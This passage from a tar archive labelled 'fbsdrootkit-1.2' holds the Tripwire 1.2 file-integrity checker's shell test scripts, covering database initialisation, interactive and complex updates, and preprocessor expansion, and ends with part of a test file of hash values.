filenames are specifically exercised. GHK echo "=== $ME: Setting up auxiliary scripts ===" # build run() cat << 'EOF' > $MYRUN echo running Tripwire echo $* $* laststatus=$? echo $laststatus > $STATFILE EOF # build checkstat() cat << 'EOF' > $MYCHECK DESIRED=$1 laststatus=`cat $STATFILE` if [ $laststatus -ne $DESIRED ] then echo "=== $ME: test FAILED! (expecting $DESIRED, got $laststatus) ===" echo "=== ($LOGFILE contains output from test script and Tripwire) ===" exit 1 fi EOF #### TMPFILES="@1 @2 @3 @4 @5" TMPDIRS="d1 d2" cat << 'EOF' > $MYCREATE #echo "=== $ME: creating test environment ===" rm -rf $TMPDIR mkdir $TMPDIR for f in $TMPFILES; do touch $TMPDIR/$f done for d in $TMPDIRS; do mkdir $TMPDIR/$d for f in $TMPFILES; do touch $TMPDIR/$d/$f done done touch $OLDFILE touch $GROWFILE EOF cat << 'EOF' > $MYINIT #echo "=== $ME: initializing the database ===" touch $TWCONFIG $TWDB $OLDFILE rm -f databases/* set _ $TRIPWIRE -initialize -q; shift ( . $MYRUN ; ) > $LOGFILE set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB # save a copy cp ./databases/* $SAVETWDB EOF cat << 'EOF' > $MYCREATETWCONF #echo "=== $ME: creating tw.config file ===" cat << GHK > $TWCONFIG # $TMPDIR R $TMPDIR/d1 R $TMPDIR/d2 R $TWCONFIG $TMPDIR/grow L> $TWDB E # GHK EOF # create the tw.config file # initialize the database # test update functionality # case i. updated entry # case ii. updated file # case iii. deleted file # case iv. added file # echo === $ME: BEGIN === echo $TRIPWIRE . $MYCREATE . $MYCREATETWCONF . $MYINIT echo "=== $ME: testing complex UPDATE cases" echo "=== $ME: changed ignore-mask (UPDATE file)" touch $TMPDIR/d1/@1 set _ $TRIPWIRE -q ; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSCHA; shift . $MYCHECK # change the ignore mask sed "s,$TMPDIR/d1 R,$TMPDIR/d1 L," < $TWCONFIG > /tmp/twx mv /tmp/twx $TWCONFIG set _ $TRIPWIRE -d $TWDB -q -update $TMPDIR/d1/@1; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # check to that ignore-masks are different grep "$TMPDIR/d1" ./databases/* | awk '{ print $3; }' > /tmp/tw1 grep "$TMPDIR/d1" $TWDB | awk '{ print $3; }' > /tmp/tw2 echo "diffing" >> $LOGFILE diff /tmp/tw1 /tmp/tw2 >> $LOGFILE if [ $? -ne 1 ]; then echo "=== $ME: test diff FAILED! (expecting 1, got $?) ===" echo "=== ($LOGFILE contains output from test script and Tripwire) ===" exit 1 fi echo "=== $ME: changed ignore-mask (UPDATE entry)" touch $TMPDIR/d1/@1 set _ $TRIPWIRE -q ; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSCHA; shift . $MYCHECK # change the ignore mask sed "s,$TMPDIR/d1 R,$TMPDIR/d1 L," < $TWCONFIG > /tmp/twx mv /tmp/twx $TWCONFIG set _ $TRIPWIRE -d $TWDB -q -update $TMPDIR/d1; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # check to that ignore-masks are different grep "$TMPDIR/d1" ./databases/* | awk '{ print $3; }' > /tmp/tw1 grep "$TMPDIR/d1" $TWDB | awk '{ print $3; }' > /tmp/tw2 echo "diffing" >> $LOGFILE diff /tmp/tw1 /tmp/tw2 >> $LOGFILE if [ $? -ne 1 ]; then echo "=== $ME: test diff FAILED! (expecting 1, got $?) ===" echo "=== ($LOGFILE contains output from test script and Tripwire) ===" exit 1 fi echo "=== $ME: testing UPDATED files (6 cases)" . $MYCREATE . $MYCREATETWCONF . $MYINIT echo "=== $ME: case 1: update: add new file ===" cp $SAVETWDB ./databases touch $NEWFILE set _ $TRIPWIRE -q ; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSADD; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -update $NEWFILE; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK echo "=== $ME: case 2: update: delete file ===" rm -f $OLDFILE set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSDEL; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -update $OLDFILE; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK CFILE=$TMPDIR/d1/@1 CDIR=$TMPDIR/d1 echo "=== $ME: case 3: update: update file ===" touch $CFILE set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSCHA; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -update $CFILE; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK echo "=== $ME: case 4: nonsense case (skipping) ===" echo "=== $ME: case 6: update: delete entry ===" rm -rf $CDIR set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSDEL; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -update $CDIR; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK echo "=== $ME: case 5: update: add entry ===" mkdir $CDIR touch $CDIR/@1 set _ $TRIPWIRE -q ; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSADD; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -update $CDIR; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK CFILE=$TMPDIR/d2/@1 CDIR=$TMPDIR/d2 echo "=== $ME: case 7: update: update entry ===" touch $CFILE set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSCHA; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -update $CDIR; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE ; set _ 0; shift . $MYCHECK echo "=== $ME: PASS ===" echo echo fbsdrootkit-1.2/tripwire-1.2/tests/test.inter.sh100700 764 764 17473 5532334113 17127 0ustar dfdf#!/bin/sh # $Id: test.inter.sh,v 1.10 1994/02/22 07:46:19 gkim Exp $ # # Rigorous Tripwire functionality test suite # # Gene Kim # Purdue University # ME=$0 TMPDIR=/tmp/twtest TWCONFIG=$TMPDIR/tw.config TWDB=$TMPDIR/tw.db TRIPWIRE="../src/tripwire -loosedir -c $TWCONFIG -d $TWDB -i all " UPDATEFLAG="interactive -interactivetest_yesimsure" NEWFILE="$TMPDIR/d1/@@NEWFILE" OLDFILE="$TMPDIR/@@OLDFILE" GROWFILE="$TMPDIR/grow" STATFILE="/tmp/twstat"; SAVETWDB=/tmp/twXXX LOGFILE=/tmp/TWLOG STATUSADD=2 # exit status of Tripwire STATUSDEL=4 STATUSCHA=8 MYRUN=/tmp/twrun.sh MYCHECK=/tmp/twcheck.sh MYCREATE=/tmp/twcreate.sh MYINIT=/tmp/twinit.sh MYCREATETWCONF=/tmp/twctwconf.sh cat << GHK === $ME: DESCRIPTION This shell script exercises all the interactive update of Tripwire databases. GHK echo "=== $ME: Setting up auxiliary scripts ===" # build run() cat << 'EOF' > $MYRUN #sleep 1 # agh! Bug in SunOS tmpfs!!! echo running Tripwire echo $* $* laststatus=$? echo $laststatus > $STATFILE EOF # build checkstat() cat << 'EOF' > $MYCHECK DESIRED=$1 laststatus=`cat $STATFILE` if [ $laststatus -ne $DESIRED ] then echo "=== $ME: test FAILED! (expecting $DESIRED, got $laststatus) ===" echo "=== ($LOGFILE contains output from test script and Tripwire) ===" exit 1 fi EOF #### TMPFILES="f1 f2 f3 f4 f5" TMPDIRS="d1 d2" cat << 'EOF' > $MYCREATE #echo "=== $ME: creating test environment ===" rm -rf $TMPDIR mkdir $TMPDIR for f in $TMPFILES; do touch $TMPDIR/$f done for d in $TMPDIRS; do mkdir $TMPDIR/$d for f in $TMPFILES; do touch $TMPDIR/$d/$f done done touch $OLDFILE touch $GROWFILE EOF cat << 'EOF' > $MYINIT #echo "=== $ME: initializing the database ===" touch $TWCONFIG $TWDB $OLDFILE rm -f databases/* set _ $TRIPWIRE -initialize -q; shift ( . $MYRUN ; ) > $LOGFILE set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB # save a copy cp ./databases/* $SAVETWDB EOF cat << 'EOF' > $MYCREATETWCONF #echo "=== $ME: creating tw.config file ===" cat << GHK > $TWCONFIG # $TMPDIR R $TMPDIR/d1 R $TMPDIR/d2 R $TWCONFIG $TMPDIR/grow L> $TWDB E # GHK EOF # create the tw.config file # initialize the database # test update functionality # case i. updated entry # case ii. updated file # case iii. deleted file # case iv. added file # echo === $ME: BEGIN === echo $TRIPWIRE . $MYCREATE . $MYCREATETWCONF . $MYINIT echo "=== $ME: testing interactive update ===" set _ $TRIPWIRE -q ; shift ( . $MYRUN ; ) > $LOGFILE ; set _ 0; shift; . $MYCHECK touch $TMPDIR/d1/f1 set _ $TRIPWIRE -q ; shift ( . $MYRUN ; ) >> $LOGFILE ; set _ $STATUSCHA; shift; . $MYCHECK set _ $TRIPWIRE -q -$UPDATEFLAG; shift ( . $MYRUN ; ) >> $LOGFILE ; set _ 0; shift; . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q ; shift ( . $MYRUN ; ) >> $LOGFILE ; set _ 0; shift; . $MYCHECK echo "=== $ME: testing complex UPDATE cases" . $MYCREATE . $MYCREATETWCONF . $MYINIT echo "=== $ME: changed ignore-mask (UPDATE file)" touch $TMPDIR/d1/f1 set _ $TRIPWIRE -q ; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSCHA; shift . $MYCHECK # change the ignore mask sed "s,$TMPDIR/d1 R,$TMPDIR/d1 L," < $TWCONFIG > /tmp/twx mv /tmp/twx $TWCONFIG set _ $TRIPWIRE -d $TWDB -q -$UPDATEFLAG ; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # check to that ignore-masks are different grep "$TMPDIR/d1/f1" ./databases/* | awk '{ print $3; }' > /tmp/tw1 grep "$TMPDIR/d1/f1" $TWDB | awk '{ print $3; }' > /tmp/tw2 echo "diffing" >> $LOGFILE diff /tmp/tw1 /tmp/tw2 >> $LOGFILE if [ $? -ne 1 ]; then echo "=== $ME: test diff FAILED! (expecting 1, got $?) ===" echo "=== ($LOGFILE contains output from test script and Tripwire) ===" exit 1 fi echo "=== $ME: changed ignore-mask (UPDATE entry)" touch $TMPDIR/d1/f1 set _ $TRIPWIRE -q ; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSCHA; shift . $MYCHECK # change the ignore mask sed "s,$TMPDIR/d1 R,$TMPDIR/d1 L," < $TWCONFIG > /tmp/twx mv /tmp/twx $TWCONFIG set _ $TRIPWIRE -d $TWDB -q -$UPDATEFLAG; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # check to that ignore-masks are different grep "$TMPDIR/d1/f1" ./databases/* | awk '{ print $3; }' > /tmp/tw1 grep "$TMPDIR/d1/f1" $TWDB | awk '{ print $3; }' > /tmp/tw2 echo "diffing" >> $LOGFILE diff /tmp/tw1 /tmp/tw2 >> $LOGFILE if [ $? -ne 1 ]; then echo "=== $ME: test diff FAILED! (expecting 1, got $?) ===" echo "=== ($LOGFILE contains output from test script and Tripwire) ===" exit 1 fi echo "=== $ME: testing UPDATED files (6 cases)" . $MYCREATE . $MYCREATETWCONF . $MYINIT echo "=== $ME: case 1: update: add new file ===" cp $SAVETWDB ./databases touch $NEWFILE set _ $TRIPWIRE -q ; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSADD; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -$UPDATEFLAG; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK echo "=== $ME: case 2: update: delete file ===" rm -f $OLDFILE set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSDEL; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -$UPDATEFLAG; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK CFILE=$TMPDIR/d1/f1 CDIR=$TMPDIR/d1 echo "=== $ME: case 3: update: update file ===" touch $CFILE set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSCHA; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -$UPDATEFLAG; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK echo "=== $ME: case 4: nonsense case (skipping) ===" echo "=== $ME: case 6: update: delete entry ===" rm -rf $CDIR set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSDEL; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -$UPDATEFLAG; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK echo "=== $ME: case 5: update: add entry ===" mkdir $CDIR set _ $TRIPWIRE -q ; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSADD; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -$UPDATEFLAG; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK CFILE=$TMPDIR/d2/f1 CDIR=$TMPDIR/d2 echo "=== $ME: case 7: update: update entry ===" touch $CFILE set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSCHA; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -$UPDATEFLAG; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE ; set _ 0; shift . $MYCHECK echo "=== $ME: PASS ===" echo echo fbsdrootkit-1.2/tripwire-1.2/tests/test.twpre.sh100700 764 764 2657 5532334114 17126 0ustar dfdf#!/bin/sh ME=$0 TMPINFILE=/tmp/tw1 TMPOUTFILE=/tmp/tw2 TMPOUTCTRL=/tmp/twctrl TMPINC1=/tmp/twinc1 TMPINC2=/tmp/twinc2 cat << EOF === $ME: DESCRIPTION This script excercises the Tripwire preprocessor, testing correctness variable expansion and include files. === $ME: BEGIN === EOF TW="../src/tripwire -E" cat << EOF > $TMPINFILE @@define VN1 @@define VN2 @@define VN3 @@define VN4 @@define VN5 @@define V1 Z+pinugs123 @@define V2 Y+pinugs123 @@define V3 Z+pinugs123 @@define V4 W+pinugs123 @@define V5 V+pinugs123 @@VN1 @@VN2 @@VN3 @@VN4 @@VN5 @@V1 @@V2 @@V3 @@V4 @@V5 @@V1 @@V1 @@V1 @@V1 @@V1 @@V1@@V1@@V1@@V1@@V1 @@V1@@V1@@V1@@V1@@V1@@V1@@V1@@V1@@V1@@V1 @@define X1_1 XX @@{X1_1} X1_1 @@define X 1 @@define XX 2 @@define XXX 3 @@{X}@@{XX}@@{XXX} @@include $TMPINC1 EOF cat << EOF > $TMPOUTCTRL Z+pinugs123 Y+pinugs123 Z+pinugs123 W+pinugs123 V+pinugs123 Z+pinugs123 Z+pinugs123 Z+pinugs123 Z+pinugs123 Z+pinugs123 Z+pinugs123Z+pinugs123Z+pinugs123Z+pinugs123Z+pinugs123 Z+pinugs123Z+pinugs123Z+pinugs123Z+pinugs123Z+pinugs123Z+pinugs123Z+pinugs123Z+pinugs123Z+pinugs123Z+pinugs123 XX X1_1 123 xxx xxx xxx xxx EOF cat > $TMPINC1 << EOF @@define F1 xxx @@{F1} @@F1 @@include $TMPINC2 EOF cat > $TMPINC2 << EOF @@{F1} @@F1 EOF $TW -c $TMPINFILE > $TMPOUTFILE diff $TMPOUTFILE $TMPOUTCTRL if [ $? -ne 0 ] then echo "=== $ME: FAILED ===" exit 1 else echo "=== $ME: PASS ===" exit 0 fi #rm -f $TMPOUTFILE $TMPINFILE $TMPOUTCTRL fbsdrootkit-1.2/tripwire-1.2/tests/test.update.sh100700 764 764 21126 5532334116 17261 0ustar dfdf#!/bin/sh # $Id: test.update.sh,v 1.6 1994/02/22 07:46:22 gkim Exp $ # # Rigorous Tripwire functionality test suite # # Gene Kim # Purdue University # ME=$0 TMPDIR=/tmp/twtest TWCONFIG=$TMPDIR/tw.config TWDB=$TMPDIR/tw.db TRIPWIRE="../src/tripwire -loosedir -c $TWCONFIG -d $TWDB -i all " NEWFILE="$TMPDIR/d1/@@NEWFILE" OLDFILE="$TMPDIR/@@OLDFILE" GROWFILE="$TMPDIR/grow" STATFILE="/tmp/twstat"; SAVETWDB=/tmp/twXXX LOGFILE=/tmp/TWLOG STATUSADD=2 # exit status of Tripwire STATUSDEL=4 STATUSCHA=8 MYRUN=/tmp/twrun.sh MYCHECK=/tmp/twcheck.sh MYCREATE=/tmp/twcreate.sh MYINIT=/tmp/twinit.sh MYCREATETWCONF=/tmp/twctwconf.sh cat << GHK === $ME: DESCRIPTION This shell script exercises all the Tripwire integrity checking and database update functionalities. GHK echo "=== $ME: Setting up auxiliary scripts ===" # build run() cat << 'EOF' > $MYRUN #sleep 1 # agh! Bug in SunOS tmpfs!!! echo running Tripwire echo $* $* laststatus=$? echo $laststatus > $STATFILE EOF # build checkstat() cat << 'EOF' > $MYCHECK DESIRED=$1 laststatus=`cat $STATFILE` if [ $laststatus -ne $DESIRED ] then echo "=== $ME: test FAILED! (expecting $DESIRED, got $laststatus) ===" echo "=== ($LOGFILE contains output from test script and Tripwire) ===" exit 1 fi EOF #### TMPFILES="f1 f2 f3 f4 f5" TMPDIRS="d1 d2" cat << 'EOF' > $MYCREATE #echo "=== $ME: creating test environment ===" rm -rf $TMPDIR mkdir $TMPDIR for f in $TMPFILES; do touch $TMPDIR/$f done for d in $TMPDIRS; do mkdir $TMPDIR/$d for f in $TMPFILES; do touch $TMPDIR/$d/$f done done touch $OLDFILE touch $GROWFILE EOF cat << 'EOF' > $MYINIT #echo "=== $ME: initializing the database ===" touch $TWCONFIG $TWDB $OLDFILE rm -f databases/* set _ $TRIPWIRE -initialize -q; shift ( . $MYRUN ; ) > $LOGFILE set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB # save a copy cp ./databases/* $SAVETWDB EOF cat << 'EOF' > $MYCREATETWCONF #echo "=== $ME: creating tw.config file ===" cat << GHK > $TWCONFIG # $TMPDIR R $TMPDIR/d1 R $TMPDIR/d2 R $TWCONFIG $TMPDIR/grow L> $TWDB E # GHK EOF # create the tw.config file # initialize the database # test update functionality # case i. updated entry # case ii. updated file # case iii. deleted file # case iv. added file # echo === $ME: BEGIN === echo $TRIPWIRE . $MYCREATE . $MYCREATETWCONF . $MYINIT echo "=== $ME: testing GROWING (safe) files ===" cp $TWCONFIG $GROWFILE set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE ; set _ 0; shift; . $MYCHECK touch $OLDFILE . $MYINIT echo "=== $ME: testing GROWING (unsafe) files ===" rm -f $GROWFILE touch $GROWFILE set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSCHA; shift . $MYCHECK . $MYINIT echo "=== $ME: testing ADDED files ===" touch $NEWFILE set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE ; rm -f $NEWFILE set _ $STATUSADD; shift . $MYCHECK echo "=== $ME: testing DELETED files ===" rm -f $OLDFILE set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE ; set _ $STATUSDEL; shift . $MYCHECK touch $OLDFILE echo "=== $ME: testing CHANGED files ===" set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE ; set _ $STATUSCHA; shift . $MYCHECK echo "=== $ME: testing input schemes ===" . $MYCREATE . $MYCREATETWCONF . $MYINIT echo "=== $ME: tw.config from stdin" set _ $TRIPWIRE -q -c - -d $TWDB; shift ( . $MYRUN ; ) > $LOGFILE < $TWCONFIG ; set _ 0; shift . $MYCHECK echo "=== $ME: database from stdin" set _ $TRIPWIRE -q -c $TWCONFIG -d - ; shift ( . $MYRUN ; ) > $LOGFILE < $TWDB ; set _ 0; shift . $MYCHECK echo "=== $ME: testing complex UPDATE cases" . $MYCREATE . $MYCREATETWCONF . $MYINIT echo "=== $ME: changed ignore-mask (UPDATE file)" touch $TMPDIR/d1/f1 set _ $TRIPWIRE -q ; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSCHA; shift . $MYCHECK # change the ignore mask sed "s,$TMPDIR/d1 R,$TMPDIR/d1 L," < $TWCONFIG > /tmp/twx mv /tmp/twx $TWCONFIG set _ $TRIPWIRE -d $TWDB -q -update $TMPDIR/d1/f1; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # check to that ignore-masks are different grep "$TMPDIR/d1/f1" ./databases/* | awk '{ print $3; }' > /tmp/tw1 grep "$TMPDIR/d1/f1" $TWDB | awk '{ print $3; }' > /tmp/tw2 echo "diffing" >> $LOGFILE diff /tmp/tw1 /tmp/tw2 >> $LOGFILE if [ $? -ne 1 ]; then echo "=== $ME: test diff FAILED! (expecting 1, got $?) ===" echo "=== ($LOGFILE contains output from test script and Tripwire) ===" exit 1 fi echo "=== $ME: changed ignore-mask (UPDATE entry)" touch $TMPDIR/d1/f1 set _ $TRIPWIRE -q ; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSCHA; shift . $MYCHECK # change the ignore mask sed "s,$TMPDIR/d1 R,$TMPDIR/d1 L," < $TWCONFIG > /tmp/twx mv /tmp/twx $TWCONFIG set _ $TRIPWIRE -d $TWDB -q -update $TMPDIR/d1; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # check to that ignore-masks are different grep "$TMPDIR/d1/f1" ./databases/* | awk '{ print $3; }' > /tmp/tw1 grep "$TMPDIR/d1/f1" $TWDB | awk '{ print $3; }' > /tmp/tw2 echo "diffing" >> $LOGFILE diff /tmp/tw1 /tmp/tw2 >> $LOGFILE if [ $? -ne 1 ]; then echo "=== $ME: test diff FAILED! (expecting 1, got $?) ===" echo "=== ($LOGFILE contains output from test script and Tripwire) ===" exit 1 fi echo "=== $ME: testing UPDATED files (6 cases)" . $MYCREATE . $MYCREATETWCONF . $MYINIT echo "=== $ME: case 1: update: add new file ===" cp $SAVETWDB ./databases touch $NEWFILE set _ $TRIPWIRE -q ; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSADD; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -update $NEWFILE; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK echo "=== $ME: case 2: update: delete file ===" rm -f $OLDFILE set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSDEL; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -update $OLDFILE; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK CFILE=$TMPDIR/d1/f1 CDIR=$TMPDIR/d1 echo "=== $ME: case 3: update: update file ===" touch $CFILE set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSCHA; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -update $CFILE; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK echo "=== $ME: case 4: nonsense case (skipping) ===" echo "=== $ME: case 6: update: delete entry ===" rm -rf $CDIR set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSDEL; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -update $CDIR; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK echo "=== $ME: case 5: update: add entry ===" mkdir $CDIR set _ $TRIPWIRE -q ; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSADD; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -update $CDIR; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK CFILE=$TMPDIR/d2/f1 CDIR=$TMPDIR/d2 echo "=== $ME: case 7: update: update entry ===" touch $CFILE set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSCHA; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -update $CDIR; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE ; set _ 0; shift . $MYCHECK echo "=== $ME: PASS ===" echo echo fbsdrootkit-1.2/tripwire-1.2/tests/test0.key100600 764 764 16015 5614757766 16263 0ustar dfdf*** ./testfiles/t_file0 *** sig0: nullsig : 0 sig1: md5 : d41d8cd98f00b204e9800998ecf8427e sig2: snefru : 8617f366566a011837f4fb4ba5bedea2 sig3: crc32 : 00000000 sig4: crc16 : 0000 sig5: md4 : 31d6cfe0d16ae931b73c59d7e0c089c0 sig6: md2 : 8350e5a3e24c153df2275c9f80692773 sig7: sha : da39a3ee5e6b4b0d3255bfef95601890afd80709 sig8: haval : 1bdc556b29ad02ec09af8c66477f2a87 sig9: nullsig : 0 *** ./testfiles/t_file1 *** sig0: nullsig : 0 sig1: md5 : 0cc175b9c0f1b6a831c399e269772661 sig2: snefru : bf5ce540ae51bc50399f96746c5a15bd sig3: crc32 : b73d8601 sig4: crc16 : e8c1 sig5: md4 : bde52cb31de33e46245e05fbdbd6fb24 sig6: md2 : 32ec01ec4a6dac72c0ab96fb34c0b5d1 sig7: sha : 86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 sig8: haval : 24d2bc955a219e3e06462c91b555cfa1 sig9: nullsig : 0 *** ./testfiles/t_file10 *** sig0: nullsig : 0 sig1: md5 : ba1f2511fc30423bdbb183fe33f3dd0f sig2: snefru : bc3a50af82bf56d6a64732bc7b050a93 sig3: crc32 : 75152d3d sig4: crc16 : c43b sig5: md4 : 19e6b41091f5eddd2abbe43139481746 sig6: md2 : 9efb894dacb19a345e3519bff3fadd65 sig7: sha : a8fdc205a9f19cc1c7507a60c4f01b13d11d7fd0 sig8: haval : 6508d08fbf578a95661847ffda055627 sig9: nullsig : 0 *** ./testfiles/t_file11 *** sig0: nullsig : 0 sig1: md5 : e7df7cd2ca07f4f1ab415d457a6e1c13 sig2: snefru : c5b8a04985a8eadfb4331a8988752b77 sig3: crc32 : b68e0ba9 sig4: crc16 : b415 sig5: md4 : 37d4546740294870f3ff7dc3ae7f0297 sig6: md2 : ffc70b71eb524609e8e58ae761be4e7b sig7: sha : 1be168ff837f043bde17c0314341c84271047b31 sig8: haval : ce11d80d0ef871d1549f8cea2337c0c4 sig9: nullsig : 0 *** ./testfiles/t_file12 *** sig0: nullsig : 0 sig1: md5 : d577273ff885c3f84dadb8578bb41399 sig2: snefru : d559a2b62f6f44111324f85208723707 sig3: crc32 : a3e3626b sig4: crc16 : 38e4 sig5: md4 : b1a45cdad19cb02482323fac9cea9b9f sig6: md2 : 3c84d0028288e38d32199b73c9ee91d3 sig7: sha : 